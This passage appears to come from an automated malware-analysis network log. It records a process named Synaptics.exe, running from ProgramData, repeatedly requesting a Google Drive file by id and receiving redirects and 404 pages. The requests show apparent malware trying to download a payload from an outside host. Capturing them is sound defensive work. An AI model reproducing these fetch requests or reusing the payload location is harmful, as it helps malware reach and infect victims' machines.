                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="oSaTQ5o9ujUNvz1Q-J_Dvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 49919 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:41 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6Y3g6nTdC_90wwTFlUzGeyiW_EWIlvUHK9oUwPShtsEkoRmh2o5u6JZoU7agqtEHPRupE7wl8
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dRvZgDaa8ncDK3lhuL4Etg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:41 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:41 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="65apdYHOVuCsAZl-6xSmSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:41 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.4 | 49921 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:42 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:42 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AtcnJdTZgXI1aOq-UyHpGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.4 | 49922 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:42 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:42 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AZ6BYy9Kwgf11juDmWI9gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.4 | 49923 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:42 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.4 | 49924 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:42 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.4 | 49928 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GRbQFVXDdgVQoYDVrl-UJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.4 | 49929 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:43 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6UgqQLGk0pOkDiEQB7tGQfAtnR9Zrn-M0jz32kXc8TS-r-7w8W8WoC-5ZK6tHubqGjceBPNkE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-D_f3tEqjkMscKGBcSLhSLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:43 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:43 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="ioB5wE9TKL-aB9IR1A3AgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:43 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.4 | 49931 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-acKrdUVhk3zLCwa70tgAkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.4 | 49930 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:43 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Ng-uflHtoCJ-JOnCI818gn1ayzlH_BF1ZEO-y20tKgbTg73JkmBmuVRmo56yzlxKKD78WB1I
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:43 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G-Bj5WmIBPjDPw9VGvadDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:43 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:43 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="mzJlnEaz9uuaNgFSp0VmIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:43 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.4 | 49933 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:44 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sSjLswB0OlnPnx0FZB_NLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.4 | 49932 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:44 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
